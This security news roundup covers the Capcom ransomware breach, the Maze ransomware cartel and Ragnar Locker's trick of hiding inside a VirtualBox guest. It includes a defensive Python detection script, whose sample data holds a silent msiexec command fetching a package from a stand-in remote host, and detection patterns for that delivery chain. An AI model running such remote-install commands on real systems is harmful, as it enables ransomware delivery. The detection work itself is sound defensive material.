Capcom faces a breach and it’s serious

Capcom, home to many iconic franchises such as Street Fighter, Resident Evil and Monster Hunter, is the latest victim of a cyber attack. Reports claim that Capcom was the victim of a ransomware attack by a program called Ragnar Locker. Ragnar Locker is a ransomware strain whose operators probe vulnerable systems with repeated small-scale attacks until one finally breaks through.

Capcom stated that the attack occurred in the early hours of November 2 and affected access to certain systems, including email and file servers. Capcom has confirmed a third party was responsible for the attack. As a result of the attack, Capcom says it has halted some operations of its internal networks.

“Capcom expressed its deepest regret for any inconvenience this may cause to its various stakeholders,” Capcom wrote. “Further, it stated that at present there is no indication that any customer information was breached. This incident has not affected connections for playing the company’s games online or access to its various websites.”

Ransomware has been on the rise lately and is the latest cyber security threat that big organizations need to be wary of. As the name suggests, once the information is stolen, those responsible for the attack hold the information hostage until demands are met. The trade-off being that the attackers promise to delete the information once their payment has been received, although, as ransomware attacks continue, keeping that promise is becoming increasingly less common.

The attackers claim to have stolen 1 TB of unencrypted files from the corporate networks in Japan, USA, and Canada. This includes all kinds of private and sensitive corporate data ranging from financial reports, intellectual property information, and even company emails and messenger conversations.

But Capcom claims no data has been stolen and that all of it is intact; it is working on restoring the systems.

Maze Cartel Expands

The Maze ransomware “cartel” is growing.

Two more ransomware gangs, Conti and SunCrypt, have apparently joined the Maze collective, which currently consists of Maze, LockBit and Ragnar Locker.

Maze operators announced the creation of a ransomware cartel that included other cybercrime gangs, which teamed up to share resources, leak victims’ data on Maze’s “news” site and extort their victims.

The Conti ransomware gang, which recently launched its own data leak site, is collaborating with Maze. “They’ve published data from a number of Maze attacks.”

Conti may be a replacement for Ryuk, which has seen a significant dip in activity in recent weeks. It shares some of its code with Ryuk, uses the same note and also the same infrastructure, which could indicate it was created by the Ryuk team or a splinter group.

Recently, researchers came across a leak disclosure post in which Conti ransomware operators claim to have breached the Volkswagen Group.

This further expansion highlights the increasing momentum of Maze, which has claimed responsibility for several high-profile ransomware attacks in recent months. Earlier this month, a major cyberattack on technology giant Canon was believed to be the latest work of the cybercriminal gang.

Ragnar Locker Ransomware

Threat actors have developed a new attack method: hiding Ragnar Locker ransomware inside a virtual machine to avoid detection.

Ragnar Locker

A recently analyzed Ragnar Locker ransomware attack “takes defense evasion to a new level.” According to the post, this variant was deployed inside a Windows XP virtual machine in order to hide the malicious code from anti-malware detection. The virtual machine runs on an old version of Sun xVM VirtualBox, a free, open source hypervisor that was acquired by Oracle when it acquired Sun Microsystems in 2010.

“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,”

The MSI package contained Sun xVM VirtualBox version 3.0.4, which was released August of 2009, and “an image of a stripped-down version of the Windows XP SP3 operating system, called MicroXP v0.82.” In that image is a 49 KB Ragnar Locker executable file.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,”
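The quote above is the practical detection lesson of this technique: nothing running inside the guest (vrun.exe, the MicroXP image) is visible to host security tools, so host-side detection has to key on the delivery stages that do run on the host, namely msiexec.exe pulling a package from a remote web server with a silent-install flag, and a VirtualBox binary starting on a machine that has no business running a hypervisor. The following is an added example, not code from the original post or from the researchers it cites; the process-creation events are constructed sample data with a hypothetical host naming scheme, and the field names are assumed to mirror what Sysmon Event ID 1 or an EDR would record.

```python
import re

# Constructed process-creation events (hypothetical sample data, not real telemetry).
# Each record is one process start: host, user, parent image, image path and command line.
SAMPLE_EVENTS = [
    # GPO-style task: msiexec silently installing an MSI fetched from a remote web server.
    {"host": "ws01", "user": "NT AUTHORITY\\SYSTEM", "parent": "svchost.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://203.0.113.10/pkg/update.msi /q"},
    # The package then launches a headless VirtualBox guest on a plain workstation.
    {"host": "ws01", "user": "NT AUTHORITY\\SYSTEM", "parent": "msiexec.exe",
     "image": r"C:\Program Files\Sun\xVM VirtualBox\VBoxHeadless.exe",
     "cmdline": r'VBoxHeadless.exe --startvm "micro"'},
    # Benign: a developer box where VirtualBox is expected.
    {"host": "dev07", "user": "CORP\\alice", "parent": "explorer.exe",
     "image": r"C:\Program Files\Oracle\VirtualBox\VirtualBox.exe",
     "cmdline": r"VirtualBox.exe"},
    # Benign: a quiet install, but from a local package rather than a URL.
    {"host": "ws02", "user": "CORP\\bob", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Temp\7zip.msi /qn"},
    # Suspicious but interactive: remote MSI without a silent flag.
    {"host": "ws03", "user": "CORP\\carol", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i https://203.0.113.10/tools.msi"},
]

# msiexec accepts an http(s) URL as the package source; that is the remote-download stage.
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
# Silent / no-UI install switches that make the install invisible to the logged-on user.
QUIET_FLAG = re.compile(r"(?:^|\s)/(?:q|qn|qb|quiet|passive)\b", re.IGNORECASE)
# Host-side VirtualBox binaries (old Sun xVM builds and current Oracle builds share these names).
HYPERVISOR_BINARIES = {
    "virtualbox.exe", "vboxheadless.exe", "vboxsvc.exe", "vboxmanage.exe", "vboxsdl.exe",
}


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events, hypervisor_allowed_hosts=frozenset()):
    """Run both detections over process-creation events and return a list of findings.

    hypervisor_allowed_hosts: hosts where a VirtualBox process is legitimate (dev boxes, labs).
    """
    findings = []
    for ev in events:
        image = basename(ev["image"])
        cmd = ev["cmdline"]
        if image == "msiexec.exe":
            url = REMOTE_URL.search(cmd)
            if url:
                quiet = bool(QUIET_FLAG.search(cmd))
                findings.append({
                    "host": ev["host"],
                    "rule": "msiexec_remote_package",
                    # Silent + remote is the exact combination described in the attack.
                    "severity": "high" if quiet else "medium",
                    "detail": f"msiexec fetched {url.group(0)} (quiet={quiet}, parent={ev['parent']})",
                })
        elif image in HYPERVISOR_BINARIES and ev["host"] not in hypervisor_allowed_hosts:
            findings.append({
                "host": ev["host"],
                "rule": "unexpected_hypervisor",
                "severity": "high",
                "detail": f"{image} started on non-allowlisted host (parent={ev['parent']})",
            })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS, hypervisor_allowed_hosts={"dev07"}):
        print(f"[{f['severity']}] {f['host']} {f['rule']}: {f['detail']}")
```

Running it on the sample data flags the ws01 msiexec download as high, the ws01 VBoxHeadless start as high, and the ws03 interactive remote install as medium, while the developer box and the local quiet install produce nothing. The allowlist is the important tuning knob: a hypervisor starting on a server or a standard workstation is rare enough to page on, whereas msiexec alone is noisy, which is why the rule only fires on a remote package source and raises severity when the silent switch is present.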

This was the first time virtual machines had been seen used in ransomware attacks.

It’s unclear how many organizations were affected by this recent attack and how widespread it was. In the past, the Ragnar Locker ransomware group has targeted managed service providers and used their remote access to clients to infect more organizations.